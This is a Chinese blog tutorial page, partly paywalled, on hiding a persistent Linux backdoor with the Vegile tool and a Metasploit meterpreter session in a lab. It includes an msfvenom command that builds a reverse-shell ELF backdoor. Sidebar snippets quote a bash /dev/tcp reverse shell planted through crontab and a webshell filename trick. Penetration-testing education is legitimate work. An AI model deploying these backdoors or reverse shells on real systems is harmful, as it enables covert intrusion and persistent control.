Vegile实现linux后门隐藏

最新推荐文章于 2024-05-18 09:47:04 发布
最新推荐文章于 2024-05-18 09:47:04 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: msf 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43102772/article/details/104347522
版权
本文介绍了如何使用Vegile工具在Linux系统中创建并隐藏后门,通过metasploit监听回话。首先,将Vegile部署在Kali Linux的Web服务器上,接着配置metasploit进行反弹shell监听。然后,在目标CentOS 7系统中下载并解压Vegile,赋予执行权限,并用Vegile启动后门。最后,通过删除Vegile和后门测试其隐藏效果,确保即使文件被删除,连接仍然可以维持。
摘要由CSDN通过智能技术生成

Vegile是linux中的权限维持工具。主要用来隐藏后门、和无限循环连接meterpreter来保持回话。

实验环境:
1.attack:kali 192.168.72.131
2.target:centos7 192.168.72.132
3.Vegile、metasploit

一、前期准备
将Vegile上传到kali的 /var/www/html下
在这里插入图片描述
在这里插入图片描述
kali生成后门程序保存到/var/www/html下

root@xuegod53:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.72.131  LPORT=4444 -b "\x00" -f elf -o /var/www/html/backdoor

在这里插入图片描述
二、metasploit监听
运行exploit/multi/handler,配置反弹地址、端口,开启监听。

最低0.47元/天 解锁文章
Benjiamin D
关注
专栏目录
Linux系统后门技术(隐藏帐户篇)注:已发表在《黑客手册》第6期
yxyhack's blog
09-25 1万+
  Linux系统后门技术(隐藏帐户篇)        每当我们欢天喜地的得到一个linux系统的服务器肉鸡时,最大的愿望就是能把它永远留住。当然,永远留住是不可能的,但是我们要尽量的不让它飞走。这就要用到linux后门技术了,这是项复杂的技术,本人水平有限不可能面面俱到,我只希望这一系列文章能为大家提供一点思路,在您hacking的道路上打开一扇方便之门!       言归
backdoor:用 Python 编写的 Linux 后门实现
06-04
该程序采用 Linux 后门实现,攻击者能够远程访问目标机器并获得对可执行命令的控制。 文件: server.py服务器将由受害者的机器运行。 它将隐藏自己并伪装该过程。 client.py客户端程序将由攻击者的机器运行。 它...
Linux无文件木马程序渗透测试复现
永远是少年
06-15 1199
今天继续给大家介绍渗透测试相关知识,本文主要内容是Linux无文件木马程序渗透测试复现。 一、实战介绍 二、初次渗透测试 三、无文件木马渗透测试
LINUX后门--教程(五)—— crontab隐藏后门
W小哥
07-08 3546
2.3 留crontab隐藏后门 好不容易拿下一个网站,以后还想继续使用该系统,通常都会留下一些后门,本次我们留下一个crontab隐藏后门 我们把1.sh、2.sh 文件放在本地搭建的web服务上,让受害者去下载执行 1.sh文件内容 #!/bin/bash bash -i >& /dev/tcp/192.168.184.145/5555 0>&1 反弹shell到IP地址:192.168.184.145 2.sh文件内容 (crontab -l;printf "* * *
探索未来渗透测试新维度:Vegile - 无影无形的Linux后渗透工具
最新发布
gitblog_00073的博客
05-18 478
探索未来渗透测试新维度:Vegile - 无影无形的Linux后渗透工具 VegileThis tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit a...
【一个Linux后门隐藏技巧】
qq_55213436的博客
08-15 1070
根据Linux的系统特性,经过一定的测试发现,Linux操作系对于如:xige.jpg .php类型的文件会识别为:xige.jpg类型的文件。这个是管理员最容易忽视的地方,所以我们只需要在访问的url页面中输入如:xige.jpg.%09.php就会变相的访问到xige.jpg .php;但是管理员却很难辨认出该木马文件,我们只需要访问的url页面中输入如:xige.jpg.%09.php就会变相的访问到xige.jpg .php,即可触发这个木马。......
linux内核启动后门,Linux下编写隐蔽的自启动回连后门
weixin_42407617的博客
04-30 564
一直很想补充LKM方式未实现的ROOTKIT的后门功能,奈何内核模式下虽然权限很高,但编程难度也很大。在网络安全技术中用户级程序虽然权限不高,但是编程相对简单,兼容性好。所以一般ROOTKIT也不是全部在内核中完成的,也要编写用户级的程序来辅助。本文将讲述回连后门的编写和在Linux下隐蔽地自启动的方法。回连后门的编写很容易实现,在一个典型的Socket客户端的基础上,将标准输入输出重定向到Soc...
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址.txt
04-21
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址,真实有效,亲测可用。
python基于socket进行端口转发实现后门隐藏的示例
09-19
在本文中,我们将探讨如何使用Python的socket库来实现端口转发,以此隐藏后门。端口转发是一种网络技术,它允许网络流量通过特定端口从一个网络接口转发到另一个网络接口。在这个示例中,我们将看到如何利用Python的...
linux后门N种姿势.pdf
08-07
而内核空间后门则更为隐蔽和危险,它们会直接修改操作系统内核,比如通过修改内核的系统调用表(Syscall Table)来实现攻击者的目的。 常见的后门功能包括但不限于远程控制、反弹shell、文件隐藏和加密通信等。这些...
Vegile:此工具将在您已经设置后门程序时设置您的后门rootkit,它将隐藏您的spesisifc进程,并以metasploit和透明的方式无限期地进行会话。 即使被杀死,它也会再次运行。 总是有一个过程在运行另一个进程时,所以我们可以假设这个过程像《 The Shell》中的《 Ghost》一样是不可阻挡的
02-04
Vegile:此工具将在您已经设置后门程序时设置您的后门rootkit,它将隐藏您的spesisifc进程,并以metasploit和透明的方式无限期地进行会话。 即使被杀死,它也会再次运行。 总是有一个过程在运行另一个进程时,所以我们可以假设这个过程像《 The Shell》中的《 Ghost》一样是不可阻挡的
Vegile-master.zip
03-12
隐藏后门程序
Linux后门入侵检测工具,附bash漏洞解决方法
01-09
一、rootkit简介   rootkit是Linux平台下常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。rootkit攻击能力极强,对系统的危害很大,它通过一套工具来建立后门隐藏行迹,从而让攻击者保住权限,以使它在任何时候都可以使用root权限登录到系统。   rootkit主要有两种类型:文件级别和内核级别,下面分别进行简单介绍。   1、文件级别rootkit   文件级别的rootkit一般是通过程序漏洞或者系统漏洞进入系统后,通过修改系统的重要文件来达到隐藏自己的目的。
Linux下关闭开机自启动程序(含查看、启动等命令)
weixiao的博客
08-12 9284
现在大多数的Linux衍生版已经使用systemd启动。 关于Systemd使用方法,简介如下: Systemd 启动服务 systemctl start servicename.service 关闭服务 systemctl stop servicename.service 重启服务 systemctl restart sevicename.service 重新加载配置文件 systemctl reload sevicename.service 查看服务状态 ..
linux定时执行后门,linux隐藏你的crontab后门
weixin_39582569的博客
05-14 609
crontab定时后门crontab是用来定期执行程序的命令,crond 命令每分钟会定期检查是否有要执行的工作,如果有要执行的工作便会自动执行该工作。注意: 新创建的 cron 任务,不会马上执行,至少要过 2 分钟后才可以,当然你可以重启 cron 来马上执行比如我们通过redis写crontab后,管理员上线 执行`crontab -l` 就会查看到我们留下的可疑命令。那么我们如果躲避管理员...
渗透测试工具Vegile简介
永远是少年
06-15 648
今天继续给大家介绍渗透测试相关知识,本文主要内容是渗透测试工具Vegile简介。 一、Vegile简介 二、Vegile下载安装 三、Vegile简单使用
逆向工程打造隐蔽后门
07-29 663
信息来源:《黑客x档案》序如果我现在问大家一个问题,入侵成功后我们该干什么?相信大家都会异口同声地回答:“装后门!”不错,为了保住胜利果实,我们总会四处寻找适合的后门。我们的要求并不过分——体积小、功能强大、隐蔽性强。然而前两个要求还是比较容易实现的,最让后门作者头疼也让使用者无奈的就是隐蔽性了。这次我给大家带来的就是另类的方法打造自己的隐蔽后门。前置小知识在继续本前我们需要先了解点必要的知识.在
一种可行的持续集成架构介绍
Vegile的博客
09-09 1391
关键词:工作流事件,面向发布 本文介绍一种比较完整,能够在软件开发流程中增加效率的持续集成(CI, continousintegration)框架.。关于持续集成的概念以及部分术语默认读者已知。本文先从一个Patch的生命周期介绍了该框架的主要总成部分。接下来从面向发布的角度介绍不同种类的Job.   框架中涉及到的工具为Gerrit(一种Git 代码库的托管平台),Github(
ASP网页后门隐藏方法详解
隐藏Web后门的方法 在Web开发中,后门隐藏是指在Web应用程序中隐藏后门的技术,以便在不被发现的情况下执行恶意代码。下面我们将讨论两个常见的后门隐藏方法。 **方法一:使用ASP脚本隐藏后门** 在上面的代码中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值